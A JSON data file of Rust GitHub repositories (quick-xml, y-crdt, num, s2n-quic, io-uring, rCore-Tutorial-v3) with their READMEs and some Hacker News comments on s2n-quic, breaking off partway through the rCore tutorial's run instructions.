{"data": [{"name": "tafia/quick-xml", "link": "https://github.com/tafia/quick-xml", "tags": ["xml-parser", "writer", "serialization", "deserialization", "html", "xml", "pull-parser", "performance-xml"], "stars": 834, "description": "Rust high performance xml reader and writer", "lang": "Rust", "repo_lang": "", "readme": "# quick-xml\n\n![status](https://github.com/tafia/quick-xml/actions/workflows/rust.yml/badge.svg)\n[![Crate](https://img.shields.io/crates/v/quick-xml.svg)](https://crates.io/crates/quick-xml)\n[![docs.rs](https://docs.rs/quick-xml/badge.svg)](https://docs.rs/quick-xml)\n[![codecov](https://img.shields.io/codecov/c/github/tafia/quick-xml)](https://codecov.io/gh/tafia/quick-xml)\n[![MSRV](https://img.shields.io/badge/rustc-1.52.0+-ab6000.svg)](https://blog.rust-lang.org/2021/05/06/Rust-1.52.0.html)\n\nHigh performance xml pull reader/writer.\n\nThe reader:\n- is almost zero-copy (use of `Cow` whenever possible)\n- is easy on memory allocation (the API provides a way to reuse buffers)\n- support various encoding (with `encoding` feature), namespaces resolution, special characters.\n\nSyntax is inspired by [xml-rs](https://github.com/netvl/xml-rs).\n\n## Example\n\n### Reader\n\n```rust\nuse quick_xml::events::Event;\nuse quick_xml::reader::Reader;\n\nlet xml = r#\"\n Test\n Test 2\n \"#;\nlet mut reader = Reader::from_str(xml);\nreader.trim_text(true);\n\nlet mut count = 0;\nlet mut txt = Vec::new();\nlet mut buf = Vec::new();\n\n// The `Reader` does not implement `Iterator` because it outputs borrowed data (`Cow`s)\nloop {\n // NOTE: this is the generic case when we don't know about the input BufRead.\n // when the input is a &str or a &[u8], we don't actually need to use another\n // buffer, we could directly call `reader.read_event()`\n match reader.read_event_into(&mut buf) {\n Err(e) => panic!(\"Error at position {}: {:?}\", reader.buffer_position(), e),\n // exits the loop when reaching end of file\n Ok(Event::Eof) => break,\n\n Ok(Event::Start(e)) => {\n match e.name().as_ref() {\n b\"tag1\" => println!(\"attributes values: {:?}\",\n e.attributes().map(|a| a.unwrap().value)\n .collect::>()),\n b\"tag2\" => count += 1,\n _ => (),\n }\n }\n Ok(Event::Text(e)) => txt.push(e.unescape().unwrap().into_owned()),\n\n // There are several other `Event`s we do not consider here\n _ => (),\n }\n // if we don't keep a borrow elsewhere, we can clear the buffer to keep memory usage low\n buf.clear();\n}\n```\n\n### Writer\n\n```rust\nuse quick_xml::events::{Event, BytesEnd, BytesStart};\nuse quick_xml::reader::Reader;\nuse quick_xml::writer::Writer;\nuse std::io::Cursor;\n\nlet xml = r#\"text\"#;\nlet mut reader = Reader::from_str(xml);\nreader.trim_text(true);\nlet mut writer = Writer::new(Cursor::new(Vec::new()));\nloop {\n match reader.read_event() {\n Ok(Event::Start(e)) if e.name().as_ref() == b\"this_tag\" => {\n\n // crates a new element ... alternatively we could reuse `e` by calling\n // `e.into_owned()`\n let mut elem = BytesStart::new(\"my_elem\");\n\n // collect existing attributes\n elem.extend_attributes(e.attributes().map(|attr| attr.unwrap()));\n\n // copy existing attributes, adds a new my-key=\"some value\" attribute\n elem.push_attribute((\"my-key\", \"some value\"));\n\n // writes the event to the writer\n assert!(writer.write_event(Event::Start(elem)).is_ok());\n },\n Ok(Event::End(e)) if e.name().as_ref() == b\"this_tag\" => {\n assert!(writer.write_event(Event::End(BytesEnd::new(\"my_elem\"))).is_ok());\n },\n Ok(Event::Eof) => break,\n // we can either move or borrow the event to write, depending on your use-case\n Ok(e) => assert!(writer.write_event(e).is_ok()),\n Err(e) => panic!(\"Error at position {}: {:?}\", reader.buffer_position(), e),\n }\n}\n\nlet result = writer.into_inner().into_inner();\nlet expected = r#\"text\"#;\nassert_eq!(result, expected.as_bytes());\n```\n\n## Serde\n\nWhen using the `serialize` feature, quick-xml can be used with serde's `Serialize`/`Deserialize` traits.\nThe mapping between XML and Rust types, and in particular the syntax that allows you to specify the\ndistinction between *elements* and *attributes*, is described in detail in the documentation\nfor [deserialization](https://docs.rs/quick-xml/latest/quick_xml/de/).\n\n### Credits\n\nThis has largely been inspired by [serde-xml-rs](https://github.com/RReverser/serde-xml-rs).\nquick-xml follows its convention for deserialization, including the\n[`$value`](https://github.com/RReverser/serde-xml-rs#parsing-the-value-of-a-tag) special name.\n\n### Parsing the \"value\" of a tag\n\nIf you have an input of the form `bar`, and you want to get at the `bar`,\nyou can use either the special name `$text`, or the special name `$value`:\n\n```rust,ignore\nstruct Foo {\n #[serde(rename = \"@abc\")]\n pub abc: String,\n #[serde(rename = \"$text\")]\n pub body: String,\n}\n```\n\nRead about the difference in the [documentation](https://docs.rs/quick-xml/latest/quick_xml/de/index.html#difference-between-text-and-value-special-names).\n\n### Performance\n\nNote that despite not focusing on performance (there are several unnecessary copies), it remains about 10x faster than serde-xml-rs.\n\n# Features\n\n- `encoding`: support non utf8 xmls\n- `serialize`: support serde `Serialize`/`Deserialize`\n\n## Performance\n\nBenchmarking is hard and the results depend on your input file and your machine.\n\nHere on my particular file, quick-xml is around **50 times faster** than [xml-rs](https://crates.io/crates/xml-rs) crate.\n\n```\n// quick-xml benches\ntest bench_quick_xml ... bench: 198,866 ns/iter (+/- 9,663)\ntest bench_quick_xml_escaped ... bench: 282,740 ns/iter (+/- 61,625)\ntest bench_quick_xml_namespaced ... bench: 389,977 ns/iter (+/- 32,045)\n\n// same bench with xml-rs\ntest bench_xml_rs ... bench: 14,468,930 ns/iter (+/- 321,171)\n\n// serde-xml-rs vs serialize feature\ntest bench_serde_quick_xml ... bench: 1,181,198 ns/iter (+/- 138,290)\ntest bench_serde_xml_rs ... bench: 15,039,564 ns/iter (+/- 783,485)\n```\n\nFor a feature and performance comparison, you can also have a look at RazrFalcon's [parser comparison table](https://github.com/RazrFalcon/roxmltree#parsing).\n\n## Contribute\n\nAny PR is welcomed!\n\n## License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "y-crdt/y-crdt", "link": "https://github.com/y-crdt/y-crdt", "tags": ["yjs", "crdt", "rust"], "stars": 833, "description": "Rust port of Yjs", "lang": "Rust", "repo_lang": "", "readme": "# Y CRDT\n

\n \n

\n\nA collection of Rust libraries oriented around implementing [Yjs](https://yjs.dev/) algorithm and protocol with cross-language and cross-platform support in mind. It aims to maintain behavior and binary protocol compatibility with Yjs, therefore projects using Yjs/Yrs should be able to interoperate with each other.\n\nProject organization:\n\n- **lib0** is a serialization library used for efficient (and fairly fast) data exchange.\n- **yrs** (read: *wires*) is a core Rust library, a foundation stone for other projects.\n- **yffi** (read: *wifi*) is a wrapper around *yrs* use to provide a native C foreign function interface. See also: [C header file](https://github.com/y-crdt/y-crdt/blob/main/tests-ffi/include/libyrs.h).\n- **ywasm** is a wrapper around *yrs* that targets Web Assembly and JavaScript API.\n\nOther projects using *yrs*:\n\n- [ypy](https://github.com/y-crdt/ypy) - Python bindings.\n- [yrb](https://github.com/y-crdt/yrb) - Ruby bindings.\n\n## Feature parity with Yjs project\n\n- Supported collaborative types:\n - [x] Text\n - [x] text insertion (with variable offsets including configurable UTF-8, UTF-16 and UTF-32 mappings)\n - [x] embedded elements insertion\n - [x] insertion of formatting attributes\n - [x] observe events and deltas\n - [x] Map\n - [x] insertion, update and removal of primitive JSON-like elements\n - [x] recursive insertion, update and removal of other collaborative elements of any type\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] Array\n - [x] insertion and removal of primitive JSON-like elements\n - [x] recursive insertion of other collaborative elements of any type\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] move index positions\n - [x] XmlElement\n - [x] insertion, update and removal of XML attributes\n - [x] insertion, update and removal of XML children nodes\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] XmlText\n - [x] insertion, update and removal of XML attributes\n - [x] text insertion (with variable offsets including configurable UTF-8, UTF-16 and UTF-32 mappings)\n - [x] observe events and deltas\n - [x] XmlFragment\n - [x] XmlHook (*deprecated*)\n - [x] Sub documents\n - [x] Transaction origin\n - [x] Undo/redo manager\n- Encoding formats:\n - [x] lib0 v1 encoding\n - [x] lib0 v2 encoding\n- Transaction events:\n - [x] on event update\n - [x] on after transaction\n\n## Maintainers\n\n- [Bartosz Sypytkowski](https://github.com/Horusiath)\n- [Kevin Jahns](https://github.com/dmonad)\n- [John Waidhofer](https://github.com/Waidhoferj)\n\n## Sponsors\n\n[![NLNET](https://nlnet.nl/image/logo_nlnet.svg)](https://nlnet.nl/)\n\n[![Ably](https://ably.com/assets/ably_ui/core/images/ably-logo-ad51bb21f40afd34a70df857594d6b7b84f6ceca0518f1d4d94e2b9579486351.png)](https://ably.com/)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-num/num", "link": "https://github.com/rust-num/num", "tags": ["rust", "number", "trait", "numeric-types", "num"], "stars": 833, "description": "A collection of numeric types and traits for Rust.", "lang": "Rust", "repo_lang": "", "readme": "# num\n\n[![crate](https://img.shields.io/crates/v/num.svg)](https://crates.io/crates/num)\n[![documentation](https://docs.rs/num/badge.svg)](https://docs.rs/num)\n[![minimum rustc 1.31](https://img.shields.io/badge/rustc-1.31+-red.svg)](https://rust-lang.github.io/rfcs/2495-min-rust-version.html)\n[![build status](https://github.com/rust-num/num/workflows/master/badge.svg)](https://github.com/rust-num/num/actions)\n\nA collection of numeric types and traits for Rust.\n\nThis includes new types for big integers, rationals (aka fractions), and complex numbers,\nnew traits for generic programming on numeric properties like `Integer`,\nand generic range iterators.\n\n`num` is a meta-crate, re-exporting items from these sub-crates:\n\n| Repository | Crate | Documentation |\n| ---------- | ----- | ------------- |\n| [`num-bigint`] | [![crate][bigint-cb]][bigint-c] | [![documentation][bigint-db]][bigint-d]\n| [`num-complex`] | [![crate][complex-cb]][complex-c] | [![documentation][complex-db]][complex-d]\n| [`num-integer`] | [![crate][integer-cb]][integer-c] | [![documentation][integer-db]][integer-d]\n| [`num-iter`] | [![crate][iter-cb]][iter-c] | [![documentation][iter-db]][iter-d]\n| [`num-rational`] | [![crate][rational-cb]][rational-c] | [![documentation][rational-db]][rational-d]\n| [`num-traits`] | [![crate][traits-cb]][traits-c] | [![documentation][traits-db]][traits-d]\n| ([`num-derive`]) | [![crate][derive-cb]][derive-c] | [![documentation][derive-db]][derive-d]\n\nNote: `num-derive` is listed here for reference, but it's not directly included\nin `num`. This is a `proc-macro` crate for deriving some of `num`'s traits.\n\n## Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nnum = \"0.4\"\n```\n\n## Features\n\nThis crate can be used without the standard library (`#![no_std]`) by disabling\nthe default `std` feature. Use this in `Cargo.toml`:\n\n```toml\n[dependencies.num]\nversion = \"0.4\"\ndefault-features = false\n```\n\nThe `num-bigint` crate requires the `std` feature, or the `alloc` feature may\nbe used instead with Rust 1.36 and later. Other sub-crates may also have\nlimited functionality when used without `std`.\n\nThe `libm` feature uses pure-Rust floating point implementations in `no_std`\nbuilds, enabling the `Float` trait and related `Complex` methods.\n\nThe `rand` feature enables randomization traits in `num-bigint` and\n`num-complex`.\n\nThe `serde` feature enables serialization for types in `num-bigint`,\n`num-complex`, and `num-rational`.\n\nThe `num` meta-crate no longer supports features to toggle the inclusion of\nthe individual sub-crates. If you need such control, you are recommended to\ndirectly depend on your required crates instead.\n\n## Releases\n\nRelease notes are available in [RELEASES.md](RELEASES.md).\n\n## Compatibility\n\nThe `num` crate as a whole is tested for rustc 1.31 and greater.\n\nThe `num-traits`, `num-integer`, and `num-iter` crates are individually tested\nfor rustc 1.8 and greater, if you require such older compatibility.\n\n## License\n\nLicensed under either of\n\n * [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)\n * [MIT license](http://opensource.org/licenses/MIT)\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\n\n[`num-bigint`]: https://github.com/rust-num/num-bigint\n[bigint-c]: https://crates.io/crates/num-bigint\n[bigint-cb]: https://img.shields.io/crates/v/num-bigint.svg\n[bigint-d]: https://docs.rs/num-bigint/\n[bigint-db]: https://docs.rs/num-bigint/badge.svg\n\n[`num-complex`]: https://github.com/rust-num/num-complex\n[complex-c]: https://crates.io/crates/num-complex\n[complex-cb]: https://img.shields.io/crates/v/num-complex.svg\n[complex-d]: https://docs.rs/num-complex/\n[complex-db]: https://docs.rs/num-complex/badge.svg\n\n[`num-derive`]: https://github.com/rust-num/num-derive\n[derive-c]: https://crates.io/crates/num-derive\n[derive-cb]: https://img.shields.io/crates/v/num-derive.svg\n[derive-d]: https://docs.rs/num-derive/\n[derive-db]: https://docs.rs/num-derive/badge.svg\n\n[`num-integer`]: https://github.com/rust-num/num-integer\n[integer-c]: https://crates.io/crates/num-integer\n[integer-cb]: https://img.shields.io/crates/v/num-integer.svg\n[integer-d]: https://docs.rs/num-integer/\n[integer-db]: https://docs.rs/num-integer/badge.svg\n\n[`num-iter`]: https://github.com/rust-num/num-iter\n[iter-c]: https://crates.io/crates/num-iter\n[iter-cb]: https://img.shields.io/crates/v/num-iter.svg\n[iter-d]: https://docs.rs/num-iter/\n[iter-db]: https://docs.rs/num-iter/badge.svg\n\n[`num-rational`]: https://github.com/rust-num/num-rational\n[rational-c]: https://crates.io/crates/num-rational\n[rational-cb]: https://img.shields.io/crates/v/num-rational.svg\n[rational-d]: https://docs.rs/num-rational/\n[rational-db]: https://docs.rs/num-rational/badge.svg\n\n[`num-traits`]: https://github.com/rust-num/num-traits\n[traits-c]: https://crates.io/crates/num-traits\n[traits-cb]: https://img.shields.io/crates/v/num-traits.svg\n[traits-d]: https://docs.rs/num-traits/\n[traits-db]: https://docs.rs/num-traits/badge.svg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aws/s2n-quic", "link": "https://github.com/aws/s2n-quic", "tags": ["quic", "rust", "cryptography", "s2n"], "stars": 833, "description": "An implementation of the IETF QUIC protocol", "lang": "Rust", "repo_lang": "", "readme": "# s2n-quic\n\n`s2n-quic` is a Rust implementation of the [IETF QUIC protocol](https://quicwg.org/), featuring:\n\n- a simple, easy-to-use API. See [an example](https://github.com/aws/s2n-quic/blob/main/examples/echo/src/bin/quic_echo_server.rs) of an s2n-quic echo server built with just a few API calls\n- high configurability using [providers](https://docs.rs/s2n-quic/latest/s2n_quic/provider/index.html) for granular control of functionality\n- extensive automated testing, including fuzz testing, integration testing, unit testing, snapshot testing, efficiency testing, performance benchmarking, interoperability testing and [more](https://github.com/aws/s2n-quic/blob/main/docs/ci.md)\n- integration with [s2n-tls](https://github.com/aws/s2n-tls), AWS's simple, small, fast and secure TLS implementation, as well as [rustls](https://crates.io/crates/rustls)\n- thorough [compliance coverage tracking](https://github.com/aws/s2n-quic/blob/main/docs/ci.md#compliance) of normative language in relevant standards\n- and much more, including [CUBIC congestion controller](https://www.rfc-editor.org/rfc/rfc8312.html) support, [packet pacing](https://www.rfc-editor.org/rfc/rfc9002.html#name-pacing), [Generic Segmentation Offload](https://lwn.net/Articles/188489/) support, [Path MTU discovery](https://www.rfc-editor.org/rfc/rfc8899.html), and unique [connection identifiers](https://www.rfc-editor.org/rfc/rfc9000.html#name-connection-id) detached from the address\n\nSee the [API documentation](https://docs.rs/s2n-quic) and [examples](https://github.com/aws/s2n-quic/tree/main/examples) to get started with `s2n-quic`.\n\n[![Crates.io][crates-badge]][crates-url]\n[![docs.rs][docs-badge]][docs-url]\n[![Apache 2.0 Licensed][license-badge]][license-url]\n[![Build Status][actions-badge]][actions-url]\n[![Dependencies][dependencies-badge]][dependencies-url]\n[![MSRV][msrv-badge]][msrv-url]\n\n## Installation\n\n`s2n-quic` is available on `crates.io` and can be added to a project like so:\n\n```toml\n[dependencies]\ns2n-quic = \"1\"\n```\n\n**NOTE**: On unix-like systems, [`s2n-tls`](https://github.com/aws/s2n-tls) will be used as the default TLS provider and requires a C compiler to be installed.\n\n## Example\n\nThe following implements a basic echo server and client. The client connects to the server and pipes its `stdin` on a stream. The server listens for new streams and pipes any data it receives back to the client. The client will then pipe all stream data to `stdout`.\n\n### Server\n\n```rust\n// src/bin/server.rs\nuse s2n_quic::Server;\nuse std::error::Error;\n\n#[tokio::main]\nasync fn main() -> Result<(), Box> {\n let mut server = Server::builder()\n .with_tls((\"./path/to/cert.pem\", \"./path/to/key.pem\"))?\n .with_io(\"127.0.0.1:4433\")?\n .start()?;\n\n while let Some(mut connection) = server.accept().await {\n // spawn a new task for the connection\n tokio::spawn(async move {\n while let Ok(Some(mut stream)) = connection.accept_bidirectional_stream().await {\n // spawn a new task for the stream\n tokio::spawn(async move {\n // echo any data back to the stream\n while let Ok(Some(data)) = stream.receive().await {\n stream.send(data).await.expect(\"stream should be open\");\n }\n });\n }\n });\n }\n\n Ok(())\n}\n```\n\n### Client\n\n```rust\n// src/bin/client.rs\nuse s2n_quic::{client::Connect, Client};\nuse std::{error::Error, net::SocketAddr};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box> {\n let client = Client::builder()\n .with_tls(CERT_PEM)?\n .with_io(\"0.0.0.0:0\")?\n .start()?;\n\n let addr: SocketAddr = \"127.0.0.1:4433\".parse()?;\n let connect = Connect::new(addr).with_server_name(\"localhost\");\n let mut connection = client.connect(connect).await?;\n\n // ensure the connection doesn't time out with inactivity\n connection.keep_alive(true)?;\n\n // open a new stream and split the receiving and sending sides\n let stream = connection.open_bidirectional_stream().await?;\n let (mut receive_stream, mut send_stream) = stream.split();\n\n // spawn a task that copies responses from the server to stdout\n tokio::spawn(async move {\n let mut stdout = tokio::io::stdout();\n let _ = tokio::io::copy(&mut receive_stream, &mut stdout).await;\n });\n\n // copy data from stdin and send it to the server\n let mut stdin = tokio::io::stdin();\n tokio::io::copy(&mut stdin, &mut send_stream).await?;\n\n Ok(())\n}\n```\n\n## Minimum Supported Rust Version (MSRV)\n\n`s2n-quic` will maintain a rolling MSRV (minimum supported rust version) policy of at least 6 months. The current s2n-quic version is not guaranteed to build on Rust versions earlier than the MSRV.\n\nThe current MSRV is [1.60.0][msrv-url].\n\n## Security issue notifications\n\nIf you discover a potential security issue in s2n-quic we ask that you notify\nAWS Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public github issue.\n\nIf you package or distribute s2n-quic, or use s2n-quic as part of a large multi-user service, you may be eligible for pre-notification of future s2n-quic releases. Please contact s2n-pre-notification@amazon.com.\n\n## License\n\nThis project is licensed under the [Apache-2.0 License][license-url].\n\n[crates-badge]: https://img.shields.io/crates/v/s2n-quic.svg\n[crates-url]: https://crates.io/crates/s2n-quic\n[license-badge]: https://img.shields.io/badge/license-apache-blue.svg\n[license-url]: https://aws.amazon.com/apache-2-0/\n[actions-badge]: https://github.com/aws/s2n-quic/workflows/ci/badge.svg\n[actions-url]: https://github.com/aws/s2n-quic/actions/workflows/ci.yml?query=branch%3Amain\n[docs-badge]: https://img.shields.io/docsrs/s2n-quic.svg\n[docs-url]: https://docs.rs/s2n-quic\n[dependencies-badge]: https://img.shields.io/librariesio/release/cargo/s2n-quic.svg\n[dependencies-url]: https://crates.io/crates/s2n-quic/dependencies\n[msrv-badge]: https://img.shields.io/badge/MSRV-1.60.0-green\n[msrv-url]: https://blog.rust-lang.org/2022/04/07/Rust-1.60.0.html\n", "readme_type": "markdown", "hn_comments": "there's a bunch of bullet points going through some staple material, but the last bullet point has some absurdly good high grade features!> and much more, including CUBIC congestion controller support, packet pacing, Generic Segmentation Offload support, Path MTU discovery, and unique connection identifiers detached from the addressalso, a blog announcement appeared for this, https://aws.amazon.com/blogs/security/introducing-s2n-quic-o...Is there a \"can I use\" for networks/middleboxes/etc and the problems that arise with them, that talks about the real-world aspects of trying to use QUIC universally?I'd love to use QUIC between a (non-browser) client and server for which both ends are code I've written, without having to have fallbacks to HTTP/1.1 or HTTP/2. (Among other things, I love the idea of just establishing one connection and using it for two-way communication, without worrying about things like WebSocket.)However, the client also needs to run in random places, and while it doesn't necessarily need to support hostile networks, it does need to support broken networks, which to a first approximation can be similar.Are there statistics available for whether and how often QUIC (or more generally UDP) works with:- Random ISPs of varying quality\n- Cell data connections\n- Shops and airports and similar, which commonly use captive portals and try to intercept traffic when they shouldn't, and come pretty close to being hostile networks\n- Vaguely reasonable corporate networks, that aren't trying to block QUIC but might do so through misconfiguration or through some misguided policy put in place for unrelated reasons (e.g \"our firewall rules are written about TCP and just drop all UDP and ICMP, and people complain but nobody with the power to change it\")\n- Somewhat less reasonable corporate networks, that force everything through a proxy and may require things like CONNECT-UDP or SOCKS, but still aren't actively trying to block QUICI'm hoping that efforts like fly.io's userspace wireguard stack (which uses UDP) might have data here.I'm specifically not asking about the case of networks that are actually trying to be hostile (to QUIC or otherwise), both because such networks may break any number of things including TLS or WebSockets, and because I'd like to avoid restarting the recurring discussion about whether QUIC/etc are a conspiracy to disempower network administrators. I'd love to know the statistics there too, though, if they're available.I'm also curious about the best-known method to reliably and efficiently tunnel QUIC out of a network within a client, for the purposes of separating always-QUIC logic from weird-network-handling logic. Does it make sense, for instance, to have a standard way to tunnel a secure QUIC connection through an insecure TCP connection?https://github.com/quinn-rs/quinnWill there be any available public endpoints to benchmark AWS' H3 implementation?On top of that, will Twitch and Prime Video use this library for their QUIC rollout?Why should I use this library over quiche or Quinn?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tokio-rs/io-uring", "link": "https://github.com/tokio-rs/io-uring", "tags": ["linux", "io-uring", "rust-lang"], "stars": 832, "description": "The `io_uring` library for Rust", "lang": "Rust", "repo_lang": "", "readme": "# Linux IO Uring\n[![github actions](https://github.com/tokio-rs/io-uring/workflows/ci/badge.svg)](https://github.com/tokio-rs/io-uring/actions)\n[![crates](https://img.shields.io/crates/v/io-uring.svg)](https://crates.io/crates/io-uring)\n[![license](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/tokio-rs/io-uring/blob/master/LICENSE-MIT)\n[![license](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/tokio-rs/io-uring/blob/master/LICENSE-APACHE)\n[![docs.rs](https://docs.rs/io-uring/badge.svg)](https://docs.rs/io-uring/)\n\nThe low-level [`io_uring`](https://kernel.dk/io_uring.pdf) userspace interface for Rust.\n\n## Usage\n\nTo use `io-uring` crate, first add this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nio-uring = \"0.5\"\n```\n\nNext we can start using `io-uring` crate.\nThe following is quick introduction using `Read` for file.\n\n```rust\nuse io_uring::{opcode, types, IoUring};\nuse std::os::unix::io::AsRawFd;\nuse std::{fs, io};\n\nfn main() -> io::Result<()> {\n let mut ring = IoUring::new(8)?;\n\n let fd = fs::File::open(\"README.md\")?;\n let mut buf = vec![0; 1024];\n\n let read_e = opcode::Read::new(types::Fd(fd.as_raw_fd()), buf.as_mut_ptr(), buf.len() as _)\n .build()\n .user_data(0x42);\n\n // Note that the developer needs to ensure\n // that the entry pushed into submission queue is valid (e.g. fd, buffer).\n unsafe {\n ring.submission()\n .push(&read_e)\n .expect(\"submission queue is full\");\n }\n\n ring.submit_and_wait(1)?;\n\n let cqe = ring.completion().next().expect(\"completion queue is empty\");\n\n assert_eq!(cqe.user_data(), 0x42);\n assert!(cqe.result() >= 0, \"read error: {}\", cqe.result());\n\n Ok(())\n}\n```\n\nNote that opcode `Read` is only available after kernel 5.6.\nIf you use a kernel lower than 5.6, this example will fail.\n\n## Test and Benchmarks\n\nYou can run the test and benchmark of the library with the following commands.\n\n```\n$ cargo run --package io-uring-test\n$ cargo bench --package io-uring-bench\n```\n\n\n### License\n\nThis project is licensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or\n http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or\n http://opensource.org/licenses/MIT)\n\nat your option.\n\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in io-uring by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rcore-os/rCore-Tutorial-v3", "link": "https://github.com/rcore-os/rCore-Tutorial-v3", "tags": ["rust", "risc-v", "rcore", "operating-system", "k210"], "stars": 831, "description": "Let's write an OS which can run on RISC-V in Rust from scratch!", "lang": "Rust", "repo_lang": "", "readme": "# rCore-Tutorial-v3\nrCore-Tutorial version 3.6. See the [Documentation in Chinese](https://rcore-os.github.io/rCore-Tutorial-Book-v3/).\n\nrCore-Tutorial API Docs. See the [API Docs of Ten OSes ](#OS-API-DOCS)\n\nIf you don't know Rust Language and try to learn it, please visit [Rust Learning Resources](https://github.com/rcore-os/rCore/wiki/study-resource-of-system-programming-in-RUST)\n\nOfficial QQ group number: 735045051\n\n## news\n- 23/06/2022: Version 3.6.0 is on the way! Now we directly update the code on chX branches, please periodically check if there are any updates.\n\n## Overview\n\nThis project aims to show how to write an **Unix-like OS** running on **RISC-V** platforms **from scratch** in **[Rust](https://www.rust-lang.org/)** for **beginners** without any background knowledge about **computer architectures, assembly languages or operating systems**.\n\n## Features\n\n* Platform supported: `qemu-system-riscv64` simulator or dev boards based on [Kendryte K210 SoC](https://canaan.io/product/kendryteai) such as [Maix Dock](https://www.seeedstudio.com/Sipeed-MAIX-Dock-p-4815.html)\n* OS\n * concurrency of multiple processes each of which contains mutiple native threads\n * preemptive scheduling(Round-Robin algorithm)\n * dynamic memory management in kernel\n * virtual memory\n * a simple file system with a block cache\n * an interactive shell in the userspace\n* **only 4K+ LoC**\n* [A detailed documentation in Chinese](https://rcore-os.github.io/rCore-Tutorial-Book-v3/) in spite of the lack of comments in the code(English version is not available at present)\n\n## Prerequisites\n\n### Install Rust\n\nSee [official guide](https://www.rust-lang.org/tools/install).\n\nInstall some tools:\n\n```sh\n$ rustup target add riscv64gc-unknown-none-elf\n$ cargo install cargo-binutils --vers =0.3.3\n$ rustup component add llvm-tools-preview\n$ rustup component add rust-src\n```\n\n### Install Qemu\n\nHere we manually compile and install Qemu 7.0.0. For example, on Ubuntu 18.04:\n\n```sh\n# install dependency packages\n$ sudo apt install autoconf automake autotools-dev curl libmpc-dev libmpfr-dev libgmp-dev \\\n gawk build-essential bison flex texinfo gperf libtool patchutils bc \\\n zlib1g-dev libexpat-dev pkg-config libglib2.0-dev libpixman-1-dev git tmux python3 python3-pip ninja-build\n# download Qemu source code\n$ wget https://download.qemu.org/qemu-7.0.0.tar.xz\n# extract to qemu-7.0.0/\n$ tar xvJf qemu-7.0.0.tar.xz\n$ cd qemu-7.0.0\n# build\n$ ./configure --target-list=riscv64-softmmu,riscv64-linux-user\n$ make -j$(nproc)\n```\n\nThen, add following contents to `~/.bashrc`(please adjust these paths according to your environment):\n\n```\nexport PATH=$PATH:/path/to/qemu-7.0.0/build\n```\n\nFinally, update the current shell:\n\n```sh\n$ source ~/.bashrc\n```\n\nNow we can check the version of Qemu:\n\n```sh\n$ qemu-system-riscv64 --version\nQEMU emulator version 7.0.0\nCopyright (c) 2003-2020 Fabrice Bellard and the QEMU Project developers\n```\n\n### Install RISC-V GNU Embedded Toolchain(including GDB)\n\nDownload the compressed file according to your platform From [Sifive website](https://www.sifive.com/software)(Ctrl+F 'toolchain').\n\nExtract it and append the location of the 'bin' directory under its root directory to `$PATH`.\n\nFor example, we can check the version of GDB:\n\n```sh\n$ riscv64-unknown-elf-gdb --version\nGNU gdb (SiFive GDB-Metal 10.1.0-2020.12.7) 10.1\nCopyright (C) 2020 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n```\n\n### Install serial tools(Optional, if you want to run on K210)\n\n```sh\n$ pip3 install pyserial\n$ sudo apt install python3-serial\n```\n\n## Run our project\n\n### Qemu\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run\n```\n\nAfter outputing some debug messages, the kernel lists all the applications available and enter the user shell:\n\n```\n/**** APPS ****\nmpsc_sem\nusertests\npipetest\nforktest2\ncat\ninitproc\nrace_adder_loop\nthreads_arg\nrace_adder_mutex_spin\nrace_adder_mutex_blocking\nforktree\nuser_shell\nhuge_write\nrace_adder\nrace_adder_atomic\nthreads\nstack_overflow\nfiletest_simple\nforktest_simple\ncmdline_args\nrun_pipe_test\nforktest\nmatrix\nexit\nfantastic_text\nsleep_simple\nyield\nhello_world\npipe_large_test\nsleep\nphil_din_mutex\n**************/\nRust user shell\n>> \n```\n\nYou can run any application except for `initproc` and `user_shell` itself. To run an application, just input its filename and hit enter. `usertests` can run a bunch of applications, thus it is recommended.\n\nType `Ctrl+a` then `x` to exit Qemu.\n\n### K210\n\nBefore chapter 6, you do not need a SD card:\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run BOARD=k210\n```\n\nFrom chapter 6, before running the kernel, we should insert a SD card into PC and manually write the filesystem image to it:\n\n```sh\n$ cd rCore-Tutorial-v3/os\n$ make sdcard\n```\n\nBy default it will overwrite the device `/dev/sdb` which is the SD card, but you can provide another location. For example, `make sdcard SDCARD=/dev/sdc`.\n\nAfter that, remove the SD card from PC and insert it to the slot of K210. Connect the K210 to PC and then:\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run BOARD=k210\n```\n\nType `Ctrl+]` to disconnect 